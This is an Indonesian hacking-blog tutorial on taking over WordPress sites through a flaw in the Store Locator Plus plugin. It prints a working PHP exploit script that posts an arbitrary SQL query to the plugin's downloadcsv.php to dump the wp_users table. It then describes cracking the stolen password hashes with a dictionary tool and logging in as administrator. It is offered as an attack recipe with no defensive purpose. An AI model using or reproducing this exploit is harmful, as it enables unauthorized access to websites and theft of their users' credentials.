• About
  • Sitemap
  • Privacy Policy
  • Disclaimer
  • Contact

ICHAL CYBER BLOG | HANYA SEORANG MANUSIA BIASA YANG HAUS ILMU PENGETAHUAN

DRIVER PC,LAPTOP,NOTEBOOK,SOFTWARE, GAMES, WINDOWS, MOVIES, BACKTRACK, FREE GPRS, TELKOMSEL, INDOSAT, THREE, AXIS, XL, SMART, FREN, JAVA, SIS, SISX, PYTHON, HACKING, DEFACE, DLL

  • Home
  • INJEK / DIRECT
    • XL
    • THREE
    • INDOSAT
    • AXIS
    • TELKOMSEL
    • CDMA
  • VPS / SSH
    • PORT 80
    • PORT 22
    • PORT 143
    • PORT 443
  • SOFTWARE
    • EDITOR
    • VIDIO
    • AUDIO
    • FORMATER
    • VISUAL BASIC
    • WINDOWS
  • WINDOWS / LINUX
    • WNDOWS 7
    • WINDOWS 8
    • WINDOWS 8.1
    • LINUX
    • UBUNTU
    • BACKTRACK
  • MOVIES
    • ACTIONS
    • DRAMA
    • KOMEDI
    • HORROR
    • ROMANTIS
    • ADULT 21+
  • HACKING
    • SHELL
    • ADMIN PASSWORD
    • BRUTE FORCE
    • SYMLINK
    • ROOT SERVER
    • BACKDOOR
  • TUTORIAL
    • PHOTOSHOP
    • VISUAL BASIC
    • DELPHI 7
    • PYTHON
    • PERL
    • JAVA

.

Memuat...
Home » HACKING » Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection

Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection

Pada tutorial saat ini penulis akan membahas tentang cara Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection.
Plugin ini didasarkan dari situs penyedianya di http://wordpress.org/extend/plugins/store-locator-le/, fiturnya sebagai berikut :
  • You can use it for a variety of countries, as supported by Google Maps.
  • The Store Pages add-on allows you to connect each of your locations with a WordPress page — so you can add hours, images and more!
  • Supports international languages and character sets.
  • Allows you to use unique map icons or your own custom map icons.
  • Change default map settings via the admin panel including:
  • Map type (terrain, satellite, street, etc.)
  • Inset map show/hide
  • Starting zoom level
  • You can use miles or kilometers
  • Pulldown list of cities and/or countries on search form can be toggled on/off.
  • Bulk upload your locations via the CSV loader.
  • Location search tracking and reporting, find out what your visitors are looking for.
  • Popup email form.
Plugin ini cukup populer, berikut ratingnya.

Penulis menggunakan exploit yang dibuat oleh Sammy FORGIT – sam at opensyscom dot fr -http://www.opensyscom.fr.
Sebagai berikut exploitnya :
<?php
$ch =
curl_init(“http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array(‘query’=>”SELECT * FROM wp_users”,
     ‘filename’=>’test’,
     ‘all’=>’true’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Simpan source code tersebut dengan ekstensi php ke 1 folder dengan program php.exe dari webserver apache. Disini penulis menyimpannya dengan nama wppasnow.php.
Untuk melakukan exploitasinya sebagai berikut :

Username dan password dalam bentuk hash sudah didapat, tinggal kita pecahkan password tersebut dengan WordPress PasswordHash Attack Tool yang dapat di download di http://dl.packetstormsecurity.net/Crackers/wp-hash.txt, untuk dictionary filenya dapat membuat sendiri atau dicari disitus-situs hacking.
Cara ini seperti di tulisan artikel saya sebelumnya yang berjudul Hacking SQL Injection manual pada WordPress dengan permasalahan pada suatu plugin di http://blog.xcode.or.id/?p=533.
Penulis langsung saja mencoba, ganti nilai varibel $hasP sebelumnya dengan password wordpress dalam bentuk hash yang kita dapat dari exploit yang telah dilakukan. Ganti juga nama file dictionary untuk brute dengan file dictionary milik anda.
Untuk di tempat penulis sebagai berikut :

Setelah itu tinggal di simpan lalu dijalankan seperti berikut :

Binggo, password telah didapat. Setelah password di temukan maka tinggal login admin wordpress untuk masuk ke halaman admin wordpress.
 Sumber: blog.xcode.or.id
Posted by Ichal Bocah Catroxs on Senin, 25 Juni 2012 - Rating: 4.5
Title : Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection
Description : Pada tutorial saat ini penulis akan membahas tentang cara Hacking password login wordpress yang menggunakan Plugins – Google Maps via Sto...

Share to

Facebook Google+ Twitter

0 Response to "Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection"

Posting Komentar

Posting Lebih Baru
Posting Lama
Beranda
Langganan: Posting Komentar (Atom)

Yahoo Messenger

ShoutBox

Entri Populer

  • Driver Toshiba Satellite C800 untuk Windows 7 32bit / x86
    Pratinjau sekejap Toshiba Satellite C800: Toshiba Satellite C800 memang sangat cocok buat anda yang mendambakan sebuah laptop harga terja...
  • [Driver] Axioo Neon CLW 3.522 Driver Dan Notebook Spesifikasi
    Pratinjau sekejab Axioo Neon CLW 3.522 : Laptop ini hadir dengan layar 12.1 inci dan mengusung teknologi intel prosssesor core i3.Buat an...
  • [Driver] Axioo Neon CLW 5.F20 Driver Dan Notebook Spesifikasi
    Pratinjau sekejab Axioo Neon CLW 5.F20 : Laptop ini hadir dengan layar 12.1 inci dan mengusung teknologi intel prosssesor core i5.Buat and...
  • Inject Indosat No Paket,Axis,Telkomsel,XL,Tri AON 11 Mei 2014
    Pada tanggal 11 Mei 2014 saya akan menshare Indosat yaitu Multi Kewer 1.3-1 ( New Version ) yang dibuat oleh Ifan Glewo untuk mendownload kl...

Label

  • DRIVER PC
  • GAMES
  • HACKING
  • INJECT DIRECT
  • PHREAKING
  • SOFTWARE
  • SSH VPS
  • TUTORIAL
  • WINDOWS

Random Post


WWW.JIBEG.TK

WWW.JIBEG.TK
PING


#
#

Please Bantu Saya, Like This !!!

×

Powered By Blog

Copyright © 2010 ICHAL CYBER BLOG | HANYA SEORANG MANUSIA BIASA YANG HAUS ILMU PENGETAHUAN - All Rights Reserved
Design by ICHAL SCUMET - Powered by Blogger